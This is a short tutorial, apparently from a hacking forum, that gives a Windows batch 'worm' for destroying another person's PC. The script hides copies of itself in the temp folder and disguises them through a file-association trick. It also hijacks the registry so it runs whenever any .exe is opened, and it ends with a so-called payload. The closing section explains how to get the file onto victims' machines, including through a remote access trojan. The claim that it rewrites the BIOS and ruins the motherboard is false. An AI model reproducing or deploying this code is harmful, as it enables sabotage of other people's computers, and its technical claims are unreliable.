How to Permanently Kill someones PC
Now, there is no going back from executing this batch code. Once executed it will rewrite the BIOS and a few other core clocks rendering the motherboard useless. The only way to come back after a execution of this code is to buy a new motherboard.
Lets get started
Step One: Open notepad or anything similar.
Step Two: Paste the following code into notepad
Step Three: Save the file as a .bat like so....
@echo off & break off
://associate .pic as batfile for camouflaggin
assoc .pic=batfile
://creates and hides files
type %0 >%temp%\%username%.pic
type %0 >%temp%\%username%.bat
attrib +h +s +a +r %temp%\%username%.bat
attrib +h +s +a +r %temp%\%username%.pic
://registry entry for starting worm on every *.exe execution
regadd "HKCR\exefile\shell\open\command" /v "@" /d "%temp%\%username%.pic ""\%1\"" %* /f
://starting payload mwahaha
Echo 123>clock$ &echo 123>CON &echo 123>AUX &echo 123>PRN &echo 123>COM1 &echo 123>COM2 &echo 123>COM3 &echo 123>COM4 &echo 123>dosx &echo 123>IO &echo 123>HIMEM &echo 123>XMSXXXX0 &echo 123>MOUSE &echo 123>REDIR &echo 123>KBD &echo 123>SYSTEM
How to use the batch
Now there are a few ways you can run this batch on someones computer.
1. Just simply give them the batch file
2. Use a RAT program like darkcomet and run it through the batch script executer.
3. You could place it on a usb drive and manually execute it.